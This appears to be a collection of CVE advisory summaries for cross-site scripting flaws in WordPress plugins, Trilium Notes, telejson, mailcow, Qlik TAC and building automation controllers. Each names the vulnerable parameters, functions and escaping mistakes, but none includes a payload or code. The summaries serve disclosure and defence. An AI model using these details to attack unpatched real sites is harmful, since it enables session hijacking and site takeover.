Reflected XSS in Open ISES Tickets before version 3.44.2 allows attackers to inject arbitrary JavaScript into a victim's browser session via the unsanitized 'id' GET parameter in single_unit.php. The injected value is written directly into an HTML attribute without escaping, enabling session hijacking, credential theft, or malicious redirects when a victim visits an attacker-crafted URL. This CVE is one of 69 XSS vulnerabilities patched in the v3.44.2 security release - indicating systemic input validation failures across the application. No public exploit or CISA KEV listing has been identified at time of analysis.

Stored XSS-to-RCE chain in Trilium Notes versions 0.102.1 and prior allows a network attacker to execute arbitrary Node.js code on the server by tricking an authenticated user into viewing a malicious SVG attachment. The vulnerability exploits three compounding design flaws - unsanitized SVG serving with the image/svg+xml MIME type, a deliberately disabled Content Security Policy, and an unauthenticated-from-same-origin script execution endpoint at /api/script/exec - enabling full server compromise through a single user interaction. No public exploit code or CISA KEV listing has been identified at time of analysis, but the detailed disclosure in the GitHub security advisory provides a near-complete attack recipe; EPSS data was not available in the provided intelligence.

DOM-based cross-site scripting in telejson versions prior to 6.0.0 allows unauthenticated remote attackers to execute arbitrary JavaScript by supplying a crafted JSON payload to the parse() function, specifically via a malicious _constructor-name_ property that is injected unsanitized into a new Function() call during prototype reconstruction. All applications using telejson < 6.0.0 that pass externally-sourced JSON - particularly those using postMessage for cross-frame communication - to telejson.parse() are affected. No public exploit has been identified at time of analysis, though the GHSA advisory (GHSA-ccgf-5rwj-j3hv) publishes both vulnerable and patched source code at named release tags, substantially lowering the barrier to exploitation. Vendor-released patch is available as telejson 6.0.0.

Stored cross-site scripting in the Cost of Goods by PixelYourSite WordPress plugin (versions ≤1.2.12) allows remote unauthenticated attackers to inject persistent JavaScript via the 'csvdata[0][cost_of_goods_value]' parameter. Injected payloads execute in the browser of any user (including administrators) who later views the affected page, enabling session hijacking and admin takeover. No public exploit identified at time of analysis and the issue is not listed in CISA KEV.

Cross-site scripting in Kieback & Peter DDC building automation controllers allows a network-accessible attacker to inject and execute arbitrary JavaScript within a victim's browser session when interacting with the device's web interface. Affected models span the full DDC4000 product line - DDC4002, DDC4100, DDC4200, DDC4200-L, DDC4400, and their 'E' variants (DDC4002E, DDC4020E, DDC4040E, DDC4200E, DDC4400E) - representing widely deployed OT/ICS building management infrastructure. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog; however, the ICS context elevates concern given the physical-world impact of compromised building controllers.

Reflected cross-site scripting in Beyaz Computer Software's CityPLus application (versions before V24.29750.1.0) allows remote attackers to inject malicious script into web responses that execute in a victim's browser after the victim clicks a crafted link. The CVSS 7.6 score is elevated by a High Availability impact, suggesting the XSS payload can crash or render the application unusable beyond typical session-theft outcomes. No public exploit identified at time of analysis and the issue was reported by TR-CERT (Turkey's national CERT).

Stored XSS in the Themeisle Visualizer WordPress plugin (all versions before 4.0.0) allows an authenticated low-privileged user to inject persistent malicious scripts into chart or visualization content. When a victim user subsequently views the affected page, the injected script executes in their browser within a changed scope (S:C), meaning impact extends beyond the attacker's own session to other users. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, but the low attack complexity and network-accessible vector make this straightforward to abuse on sites with open or loosely controlled contributor registration.

Stored Cross-Site Scripting via CSRF in the Anomify AI WordPress plugin (versions ≤ 0.3.6) allows unauthenticated remote attackers to inject persistent JavaScript into the WordPress admin panel by tricking a logged-in administrator into visiting an attacker-controlled page. The attack chains two flaws: a missing nonce check on the settings handler (no check_admin_referer()) that permits any cross-origin POST to modify plugin settings, and a double-quote escape bypass where the API key value is stored after sanitize_text_field() sanitization but rendered into an HTML attribute via bare echo without esc_attr(), allowing the payload to survive both sanitization and storage. No public exploit has been identified at time of analysis, and the CVE is not listed in the CISA KEV catalog.

Stored XSS in the Email Encoder WordPress plugin (all versions before 2.4.7) permits unauthenticated remote attackers to inject persistent malicious scripts by supplying unsanitized email addresses through public-facing input fields. Because the CVSS scope is Changed (S:C), injected payloads execute in victim browsers rather than the server context, enabling session hijacking, credential theft, or malicious redirects against any visitor who loads an affected page. A publicly available proof-of-concept exists per WPScan reporting; no public exploit identified at time of analysis as actively exploited via CISA KEV.

Stored Cross-Site Scripting in the AI Chatbot & Workflow Automation by AIWU WordPress plugin (versions ≤1.4.14) allows injection of arbitrary web scripts via the unsanitized X-Forwarded-For HTTP request header. The injected payload persists server-side and executes in the browser of any user who accesses an affected page, enabling session hijacking, credential theft, or malicious redirects. No public exploit has been identified at time of analysis, and no CISA KEV listing exists, though practical exploitation is further constrained by a 20-character storage limit on the injected value.

Stored cross-site scripting in Qlik Talend Administration Center allows an authenticated user holding server management permissions to inject persistent malicious script payloads that execute in the browsers of other TAC users who subsequently view the affected content. The CVSS Changed scope (S:C) signals that successful exploitation crosses security boundaries beyond the application itself, enabling impact on victim browser sessions. No public exploit code identified at time of analysis, no CISA KEV listing, but Qlik has published a security fix via their official support community.

Stored cross-site scripting in the mailcow-dockerized administrator Queue Manager allows attackers who can influence Postfix queue metadata to inject HTML/JavaScript that executes in an authenticated administrator's browser. The flaw exists because the /api/v1/get/mailq/all endpoint feeds server-controlled queue fields into DataTables rows that are rendered as HTML without sufficient output encoding. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

Stored Cross-Site Scripting in the Logo Manager For Enamad WordPress plugin (versions up to and including 0.7.4) allows authenticated attackers with contributor-level access to inject persistent malicious scripts via the 'title' attribute of three shortcodes - vc_enamad_namad, vc_enamad_shamed, and vc_enamad_custom. The injected payload executes in the browser of any user who subsequently visits the compromised page, enabling session hijacking, credential theft, or malicious redirects against site visitors and administrators. No public exploit code or active exploitation has been identified at time of analysis; however, the low privilege requirement (contributor) broadens the realistic attacker pool on multi-author WordPress sites.

Stored Cross-Site Scripting in the Faces of Users WordPress plugin (all versions through 0.0.3) allows authenticated attackers with Contributor-level access or above to inject persistent malicious JavaScript via the 'default' attribute of the 'facesofusers' shortcode. Once injected, the payload executes silently in the browser of any user who visits the compromised page, enabling session theft, credential harvesting, or malicious redirects targeting higher-privileged users including administrators. No public exploit code has been identified at time of analysis, and this CVE does not appear in the CISA KEV catalog.

Cross-Site Request Forgery chained to Stored Cross-Site Scripting in the Word 2 Cash WordPress plugin (versions ≤ 0.9.2) allows unauthenticated remote attackers to plant persistent JavaScript payloads inside the WordPress admin panel. The attack succeeds because the plugin's settings handler (w2c_admin()) performs no nonce verification, no input sanitization before storage, and no output escaping on retrieval - meaning a forged POST from any attacker-controlled page is indistinguishable from a legitimate admin save. No public exploit or CISA KEV listing has been identified at time of analysis, but the CVSS score of 6.1 with Changed scope reflects real post-exploitation reach within the admin context once triggered.

Stored Cross-Site Scripting in the General Options WordPress plugin (versions up to and including 1.1.0) allows authenticated attackers holding Administrator-level privileges to persist malicious JavaScript in the Contact Number settings field, which executes in the browser of any administrator who subsequently visits the plugin's settings page. The flaw is rooted in the misapplication of sanitize_text_field() for output escaping - a function that strips HTML tags but does not encode double-quote characters, enabling attribute context breakout when the stored value is echoed inside a double-quoted HTML attribute. WordPress's wp_magic_quotes backslash-prefixing mechanism provides no protection here because HTML parsers treat the backslash as a literal character rather than an escape sequence. No active exploitation has been confirmed (not in CISA KEV), and no public exploit code has been identified at time of analysis.

Stored Cross-Site Scripting in the Diagnosis Generator (診断ジェネレータ作成プラグイン) WordPress plugin allows any subscriber-level authenticated user to write arbitrary JavaScript into WordPress theme files by exploiting a missing capability check in themeFunc(). The payload persists in theme files and executes in every site visitor's browser upon loading any page containing the diagnosis form shortcode, giving a single low-privilege attacker persistent, cross-user script execution. No public exploit has been identified at time of analysis, but the subscriber-level access requirement makes this a broad risk on any WordPress site with open user registration.

Reflected Cross-Site Scripting in the VatanSMS WP SMS WordPress plugin (all versions through 1.01) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized `page` parameter, executing in the context of a logged-in administrator's browser session. Exploitation requires social engineering an administrator into clicking a crafted link, making this a medium-severity but realistic threat vector for WordPress site takeover or credential theft. No public exploit code has been identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog.

Reflected Cross-Site Scripting in the SponsorMe plugin for WordPress (all versions through 0.5.2) allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by tricking an authenticated user - likely a WordPress administrator - into clicking a specially crafted wp-admin/admin.php URL. The PHP_SELF superglobal is reflected unsanitized in two distinct locations within the same vulnerable function: a form action attribute (sponsorme.php:440) and an anchor href attribute (sponsorme.php:475), doubling the attack surface. No patch has been identified at time of analysis, and no public exploit or CISA KEV listing has been confirmed.

Reflected Cross-Site Scripting in the Correct Prices WordPress plugin (versions up to and including 1.0) exposes any site running this plugin to script injection via crafted URLs. The correct_prices_page() function writes the raw value of $_SERVER['PHP_SELF'] into a form's action attribute without calling esc_url() or esc_attr(), allowing an attacker to break out of the HTML attribute context and inject arbitrary markup. CVSS vector PR:N confirms no authentication is required from the attacker, though exploitation is limited by a required user interaction (UI:R) - a victim must be tricked into following a specially crafted link. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code was identified at time of analysis.

Stored Cross-Site Scripting in the Anomify AI WordPress plugin (versions ≤ 0.3.6) allows authenticated administrators to persist malicious scripts in the plugin's settings that execute in any user's browser upon visiting the settings page. The flaw exists because the plugin applies sanitize_text_field() to the anomify_api_key input - a function that strips HTML tags but does not encode double-quote characters - then echoes the stored value directly into an HTML attribute context (value="...") without the appropriate esc_attr() call. No public exploit code has been identified at time of analysis, and CISA KEV does not list this CVE; the CVSS score of 4.4 reflects the high privilege bar and high complexity required to exploit.

Stored Cross-Site Scripting in the CVMH Sticky plugin for WordPress (versions ≤2.5.6) enables authenticated contributors to inject persistent JavaScript via the `readmoretext` attribute of the `[cvmh-sticky]` shortcode. The payload executes in the browsers of any visitor loading a page containing the injected shortcode, enabling session hijacking, credential theft, or privilege escalation by targeting administrators. No public exploit is identified at time of analysis and this vulnerability is not listed in CISA KEV, but Wordfence has confirmed the flaw with direct code-level references.